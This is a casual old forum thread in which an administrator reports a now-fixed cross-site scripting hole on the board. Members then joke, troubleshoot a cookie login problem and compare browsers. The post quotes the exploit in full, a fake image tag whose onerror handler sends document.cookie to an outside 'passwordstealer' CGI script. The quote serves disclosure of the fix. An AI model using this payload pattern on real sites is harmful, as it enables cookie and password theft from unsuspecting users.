Haxors... in the GL???

[HyToFry]

With the help of justin, I've found, and eliminated a security hole that was on the GL.

Using a fake img tag that looked like this,

quote:

---

[img]fake"onerror="this.src='http://www.hytofry.com/scripts/passwordstealer.cgi?passwords=(document.cookie)';"[/img]

---

the haxor could steal your password as soon as you opened the thread. (assuming you're using a browser that stores cookies).

The problem has been taken care of.

I don't think any passwords got leaked, but if you're an admin/mod... now might be the time to change your password. (I did, but I do monthly anyway)

[justindl]

i didn't steal anyone's but my own about 5000 times

[NightOwl]

Funny you should mention that cookie saving passwords thing... for the past three months my browser can't remember the GL's password. I thought you turned it off.

[justindl]

go to preferences... it'll only do it for a year..... (this cookies thing works if you have cookies enabled at all)

[Moose]

YAY HY AND JUSTIN!!!
::hugs them both::

[Sofis]

Hy, I found an odd bug: when I change my password, I am no longer allowed into the GLOC forum, but I can still get into Private Games. Changing the password back to what it was restores my ability to get into GLOC.

[Quailman]

HAHAHAHAHAHAHA!!!! I am the haxor! Unfortunately you closed the leak when I only had one password and it turned out to belong to some dickhead.

[Marvin]

I hope that was Quailman.

[HyToFry]

Witt like that? Had to be our Quailman.

Sofis... this isn't really a bug, but a cookie problem.

If you close your IE window, open a new one (from the desktop... File->New Window won't work) then it will ask you to log in again.


(I think.)

Or, you can go to preferences, and have the site delete all cookies, and then log in.


Hope this helps.

[Sofis]

If it's a cookie problem, why would it affect only GLOC? I could get into Private Games just fine and the cookies were placing the new password into the password box. I'll try it though.

(Oh, and for the record, I use Opera, not IE.)

[Sofis]

Okay, it works.

[Lepton]

Opera has many problems. I'm surprised you've found a solution that doesn't involve blaming the bad program.

[HyToFry]

I think Opera is one of the best.

It's Nutscrape that sux. (I haven't tried 6.0, but I have heard from a reliable source that it's pretty good too.)

[Chuck]

I tried Opera. It wouldn't run Java and kept locking up my computer. Maybe other have had better luck with it.

[justindl]

opera 6 has java. im going to get it as soon as it comes out for linux . opera rocks... it really REALLY does. ALOT

[HyToFry]

I'll agree with that.

[Macros]

lol, seeing that topic title made me think i think for no reason at all, jeffk should get the title of "h4x0ring fux0r"
sorry =P

[extropalopakettle]

Most (all? some?) browsers allow you to set an option (possibly the default setting) so that cookies on your machine can only be examined by the site that put them there (generally a good idea, if you're accepting cookies at all). Would setting that option have prevented the above exploit from working? Unless, of course, the cookie password stealer was operating from the GL.

[HyToFry]

It was activated from the GL, on the GL's web page. The image was actually setting it's src to be "something.com/thisscript.cgi?yourusernameandpasswordinfohere" The browser allowed it because it was comming from this page.

The only way you could have prevented it was to not allow java to access cookies, and I don't think that's possible, and even if it was, ubb wouldn't be able to save your password if you used it.

[hucking fax0r]

HAHAHAHAHAhAHAHAHAHAHAHAHAHA!!!!!!11111

[justindl]

woohoo i just had a new idea, off to check it

[Chuck]

Let's all just email our passwords to Justin so he can relax.